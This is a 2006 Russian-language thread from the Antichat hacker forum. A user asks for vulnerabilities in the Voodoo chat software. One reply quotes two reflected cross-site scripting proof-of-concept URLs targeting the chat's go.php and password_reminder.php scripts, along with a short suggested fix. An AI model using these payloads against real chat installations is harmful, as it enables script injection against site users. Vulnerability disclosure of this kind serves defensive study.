ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Чаты
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Voodoo chat
  #1  
Старый 07.01.2006, 00:41
UID: 20638
USER: _kREveDKo_
_kREveDKo_
Banned
Регистрация: 04.12.2005
Сообщений: 826
Провел на форуме:
5223479

Репутация: 3813


По умолчанию Voodoo chat

FuckinG Voodoo Chat!!!!!!

Не могу его найти ни на лентах багтрака, ни кого ни спрашиваю - не знают... Сам просидел х*й знает сколько, копаясь в нём и выискивая хоть ЧаВо-НиБуДь.... но уж так за***лся, что.... кароче сил больше нет! Может у кого-нить есть какая-нить сек-инфа по нему? Буду оч благодарен.
 
Ответить с цитированием

  #2  
Старый 07.01.2006, 02:55
UID: 18908
USER: NaX[no]rT
NaX[no]rT
Members of Antichat
Регистрация: 03.09.2005
Сообщений: 594
Провел на форуме:
3606217

Репутация: 685


Отправить сообщение для NaX[no]rT с помощью ICQ
По умолчанию

Поищи, данная тема уже поднималась и не раз. На главной странице есть ПОИСК
 
Ответить с цитированием

  #3  
Старый 07.01.2006, 03:02
UID: 18692
USER: NeMiNeM
NeMiNeM
Постоянный
Регистрация: 22.08.2005
Сообщений: 540
Провел на форуме:
4372175

Репутация: 1221


По умолчанию

Есть пассивная хсс:
Цитата:
Type:[XSS] Product: Voodoo chat Author:qBiN exploit: http://victim.com/chat/go.php?url=javascript:alert(/Tested%20by%20qBiN/);
Решение: фильтровать переменную урл,можно даже проверять её на валидность с помощью сокетов. ------------------------------
Type:[XSS] Product: Voodoo chat Author:qBiN exploit: хттп://сите/chat/password_reminder.php?look_for=%3Cscript%3Ealert(/qBiN test/);%3C/script%3E
вот смотри ету тему:
http://forum.antichat.ru/thread11144.html
 
Ответить с цитированием

  #4  
Старый 07.01.2006, 14:01
UID: 19805
USER: Electro
Electro
Участник форума
Регистрация: 23.10.2005
Сообщений: 276
Провел на форуме:
1095453

Репутация: 113
Отправить сообщение для Electro с помощью ICQ
По умолчанию

хых больное место )
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Есть ли дыры в движке: Voodoo chat + VOC++ 0.7-rel ??? [Zarakul] Чаты 2 16.12.2005 21:59
Voodoo chat Guest Чаты 8 08.07.2005 12:01
Voodoo Chat Mefisto Чаты 11 11.02.2005 18:13



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ